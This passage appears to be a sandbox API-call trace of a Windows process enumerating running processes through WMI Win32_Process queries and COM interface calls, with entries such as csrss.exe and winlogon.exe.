WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.424] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.424] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.424] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.424] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.424] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.424] IWbemClassObject:Get (in: This=0x53f69d0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267b5b8*=0, plFlavor=0x267b5bc*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x267b5b8*=8, plFlavor=0x267b5bc*=0) returned 0x0 [0212.424] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0212.425] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0212.425] IWbemClassObject:Get (in: This=0x53f69d0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267b5b8*=8, plFlavor=0x267b5bc*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x267b5b8*=8, plFlavor=0x267b5bc*=0) returned 0x0 [0212.425] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0212.425] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0212.425] CoTaskMemAlloc (cb=0x4) returned 0x5605648 [0212.425] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5605648, puReturned=0x267acc0 | out: apObjects=0x5605648*=0x5418760, puReturned=0x267acc0*=0x1) returned 0x0 [0212.473] IUnknown:QueryInterface (in: This=0x5418760, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5418760) returned 0x0 [0212.473] IUnknown:QueryInterface (in: This=0x5418760, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.473] IUnknown:QueryInterface (in: This=0x5418760, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.474] IUnknown:AddRef (This=0x5418760) returned 0x3 [0212.474] IUnknown:QueryInterface (in: This=0x5418760, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.474] IUnknown:QueryInterface (in: This=0x5418760, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.474] IUnknown:QueryInterface (in: This=0x5418760, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5418764) returned 0x0 [0212.474] IMarshal:GetUnmarshalClass (in: This=0x5418764, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.474] IUnknown:Release (This=0x5418764) returned 0x3 [0212.474] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.474] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.474] IUnknown:QueryInterface (in: This=0x5418760, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.474] IUnknown:Release (This=0x5418760) returned 0x2 [0212.474] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.474] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.474] IUnknown:QueryInterface (in: This=0x5418760, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5418760) returned 0x0 [0212.474] IUnknown:AddRef (This=0x5418760) returned 0x4 [0212.474] IUnknown:Release (This=0x5418760) returned 0x3 [0212.474] IUnknown:Release (This=0x5418760) returned 0x2 [0212.475] CoTaskMemFree (pv=0x5605648) [0212.475] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.475] IUnknown:AddRef (This=0x5418760) returned 0x3 [0212.475] IWbemClassObject:Get (in: This=0x5418760, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.475] IWbemClassObject:Get (in: This=0x5418760, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.476] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0212.476] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x64 [0212.476] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.476] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.476] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.476] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.477] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5605648) returned 0x0 [0212.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x5605648, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.477] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5605648, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560e980) returned 0x0 [0212.477] WbemDefPath:IUnknown:Release (This=0x5605648) returned 0x0 [0212.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560e980) returned 0x0 [0212.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.477] WbemDefPath:IUnknown:AddRef (This=0x560e980) returned 0x3 [0212.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5605658) returned 0x0 [0212.478] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5605658, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.478] WbemDefPath:IUnknown:Release (This=0x5605658) returned 0x3 [0212.478] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.478] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.478] WbemDefPath:IUnknown:Release (This=0x560e980) returned 0x2 [0212.478] WbemDefPath:IUnknown:Release (This=0x560e980) returned 0x1 [0212.478] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.478] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x560e980, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560e980) returned 0x0 [0212.478] WbemDefPath:IUnknown:AddRef (This=0x560e980) returned 0x3 [0212.478] WbemDefPath:IUnknown:Release (This=0x560e980) returned 0x2 [0212.478] WbemDefPath:IWbemPath:SetText (This=0x560e980, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"420\"") returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0212.478] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.479] IWbemClassObject:Get (in: This=0x5418760, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267be1c*=0, plFlavor=0x267be20*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x267be1c*=8, plFlavor=0x267be20*=0) returned 0x0 [0212.479] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0212.479] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0212.479] IWbemClassObject:Get (in: This=0x5418760, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x267be1c*=8, plFlavor=0x267be20*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x267be1c*=8, plFlavor=0x267be20*=0) returned 0x0 [0212.479] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0212.479] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0212.479] CoTaskMemAlloc (cb=0x4) returned 0x5605698 [0212.479] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5605698, puReturned=0x267acc0 | out: apObjects=0x5605698*=0x541a768, puReturned=0x267acc0*=0x1) returned 0x0 [0212.480] IUnknown:QueryInterface (in: This=0x541a768, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x541a768) returned 0x0 [0212.480] IUnknown:QueryInterface (in: This=0x541a768, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.480] IUnknown:QueryInterface (in: This=0x541a768, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.480] IUnknown:AddRef (This=0x541a768) returned 0x3 [0212.480] IUnknown:QueryInterface (in: This=0x541a768, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.480] IUnknown:QueryInterface (in: This=0x541a768, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.481] IUnknown:QueryInterface (in: This=0x541a768, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x541a76c) returned 0x0 [0212.481] IMarshal:GetUnmarshalClass (in: This=0x541a76c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.481] IUnknown:Release (This=0x541a76c) returned 0x3 [0212.481] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.481] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.481] IUnknown:QueryInterface (in: This=0x541a768, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.481] IUnknown:Release (This=0x541a768) returned 0x2 [0212.481] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.481] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.481] IUnknown:QueryInterface (in: This=0x541a768, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x541a768) returned 0x0 [0212.481] IUnknown:AddRef (This=0x541a768) returned 0x4 [0212.481] IUnknown:Release (This=0x541a768) returned 0x3 [0212.481] IUnknown:Release (This=0x541a768) returned 0x2 [0212.481] CoTaskMemFree (pv=0x5605698) [0212.481] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.481] IUnknown:AddRef (This=0x541a768) returned 0x3 [0212.481] IWbemClassObject:Get (in: This=0x541a768, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.482] IWbemClassObject:Get (in: This=0x541a768, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.482] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0212.482] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x64 [0212.482] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.482] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.482] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.482] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.483] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5605698) returned 0x0 [0212.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x5605698, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.483] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5605698, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560ea60) returned 0x0 [0212.483] WbemDefPath:IUnknown:Release (This=0x5605698) returned 0x0 [0212.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560ea60) returned 0x0 [0212.483] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.484] WbemDefPath:IUnknown:AddRef (This=0x560ea60) returned 0x3 [0212.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56056a8) returned 0x0 [0212.484] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56056a8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.484] WbemDefPath:IUnknown:Release (This=0x56056a8) returned 0x3 [0212.484] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.484] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.484] WbemDefPath:IUnknown:QueryInterface (in: This=0x560ea60, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.484] WbemDefPath:IUnknown:Release (This=0x560ea60) returned 0x2 [0212.484] WbemDefPath:IUnknown:Release (This=0x560ea60) returned 0x1 [0212.484] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.484] CoGetContextToken (in: 